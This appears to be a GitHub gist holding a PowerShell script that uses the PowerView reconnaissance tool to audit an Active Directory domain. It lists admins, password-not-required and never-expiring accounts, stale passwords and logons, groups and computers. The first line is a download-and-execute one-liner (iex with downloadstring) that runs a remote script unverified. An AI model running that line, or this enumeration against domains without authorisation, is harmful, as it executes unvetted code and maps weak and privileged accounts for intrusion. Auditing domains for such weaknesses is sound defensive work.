@daniel0x00
Last active June 15, 2017 21:27
AD queries using PowerView to find initial misconfigurations and bad habits among domain users and domain admins.
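# Download and invoke PowerView:
# NOTE(review): this is download-and-execute of an unpinned script from a moving branch over the
# network. Nothing verifies what was fetched (no hash, no signature), so whoever controls the
# repository, that branch, or the connection decides what runs in this session. For a repeatable
# audit, review a copy once, record its hash, and dot-source that vetted local file instead; the
# remote one-liner is kept here only because it is what this gist documents.
iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# Every .txt report below lists the same columns, and every LDAP filter uses the same well-known
# userAccountControl bits, matched with the LDAP_MATCHING_RULE_BIT_AND rule (OID 1.2.840.113556.1.4.803):
#   2     = ACCOUNTDISABLE
#   32    = PASSWD_NOTREQD   (password not required)
#   65536 = DONT_EXPIRE_PASSWORD
# No -Domain is passed to Get-NetUser, so all queries run against the current ("default") domain.
$reportColumns = 'samaccountname', 'whencreated', 'lastlogontimestamp', 'pwdlastset', 'displayname'

# Cut-off dates as FILETIME integers, which is how pwdlastset/lastlogontimestamp are stored in AD
# and therefore what the LDAP "<=" comparisons below need. Computed once instead of per query.
$date_three_month = (Get-Date).AddMonths(-3).ToFileTime()
$date_six_month   = (Get-Date).AddMonths(-6).ToFileTime()

#######################################
# Persists one query result the way the original one-liners did:
#   <Name>.out  - raw objects as CliXml (Export-Clixml -InputObject, so the whole result is one item)
#   <Name>.txt  - one header line with the count, then a sorted, wrapped table of $reportColumns
# Arguments:
#   -Name        base file name without extension (kept verbatim from the original gist, typos included,
#                so existing consumers of these files keep working)
#   -Description header text; ". Count: N" is appended
#   -Users       Get-NetUser output (may be $null, a single object or an array)
#   -SortBy      property the table is sorted on
# Returns: nothing; writes the two files into the current directory.
#######################################
function Write-UserReport {
    param(
        [Parameter(Mandatory = $true)][string]$Name,
        [Parameter(Mandatory = $true)][string]$Description,
        $Users,
        [string]$SortBy = 'lastlogontimestamp'
    )
    # @() so the count is right for $null (0) and for a single object (1) on every PowerShell
    # version; the original "$out.count" is empty for a scalar result under PowerShell 2.0.
    $count = @($Users).Count
    Export-Clixml "$Name.out" -InputObject $Users
    "$Description. Count: $count" > "$Name.txt"
    $Users | Select-Object $reportColumns | Sort-Object $SortBy | Format-Table -Wrap -AutoSize >> "$Name.txt"
}

# All admin users of default domain:
# NOTE(review): "admin" here means adminCount=1. AdminSDHolder sets that flag on members of
# protected groups and does not clear it when they leave, so former admins can also appear;
# confirm the list against current group membership before acting on it.
$out = Get-NetUser -AdminCount
Write-UserReport -Name 'admins_default_domain' -Description 'All admins in the domain' -Users $out

# All enabled users (including admins) with no-password setting (PASSWD_NOTREQD set, ACCOUNTDISABLE clear)
$out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
Write-UserReport -Name 'users_no_password_default_domain' -Description 'All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all' -Users $out -SortBy pwdlastset

# All enabled users (including admins) with password never expire setting (DONT_EXPIRE_PASSWORD set)
$out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=65536)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
Write-UserReport -Name 'users_password_never_expire_default_domain' -Description 'All enabled users (including admins) with password never expire setting' -Users $out -SortBy pwdlastset

# All enabled admins with password changed > 3 months
# NOTE(review): pwdlastset=0 (password must change at next logon) also satisfies "<=", so such
# accounts show up in the two "old password" reports even though their password is not old.
$out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_three_month)(admincount=1))"
Write-UserReport -Name 'admins_enabled_with_old_password_default_domain' -Description 'All enabled admins with password changed > 3 months' -Users $out -SortBy pwdlastset

# All enabled users (including admins) with password changed > 6 months
$out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(pwdlastset<=$date_six_month))"
Write-UserReport -Name 'users_enabled_with_old_password_default_domain' -Description 'All enabled users (including admins) with password changed > 6 months' -Users $out -SortBy pwdlastset

# All enabled users (including admins) who last logon is > 3 months.
# NOTE(review): lastLogonTimestamp is the replicated, coarse-grained attribute (it lags the real
# last logon), and an account that never logged on has no value at all, so it does not match
# "<=" and is missing from the two "old logon" reports; query for absence separately if needed.
$out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month))"
Write-UserReport -Name 'users_enabled_with_old_logged_on_date_default_domain' -Description 'All enabled users (including admins) who last logon is > 3 months' -Users $out -SortBy lastlogontimestamp

# All enabled admins who last logon is > 3 months.
$out = Get-NetUser -Filter "(&(!(userAccountControl:1.2.840.113556.1.4.803:=2))(lastlogontimestamp<=$date_three_month)(admincount=1))"
Write-UserReport -Name 'admins_enabled_with_old_logged_on_date_default_domain' -Description 'All enabled admins who last logon is > 3 months' -Users $out -SortBy lastlogontimestamp

# All disabled users:  (file name spelling "dafault" kept as in the original output)
$out = Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Write-UserReport -Name 'users_disabled_dafault_domain' -Description 'All disabled users' -Users $out -SortBy lastlogontimestamp

# All enabled users:  (file name spelling "dafault" kept as in the original output)
$out = Get-NetUser -Filter "(!(userAccountControl:1.2.840.113556.1.4.803:=2))"
Write-UserReport -Name 'users_enabled_dafault_domain' -Description 'All enabled users' -Users $out -SortBy lastlogontimestamp

# All enterprise admins (recursive membership, raw objects only - no .txt summary for this one)
Get-NetGroupMember -GroupName "Enterprise Admins" -Recurse | Export-Clixml enterprise_admins_default_domain.out
# All users of default domain:
Get-NetUser | Export-Clixml users_default_domain.out
# Get all groups
Get-NetGroup -FullData | Export-Clixml groups_all_data_default_domain.out
# Get all computers
Get-NetComputer -FullData | Export-Clixml computers_all_data_default_domain.out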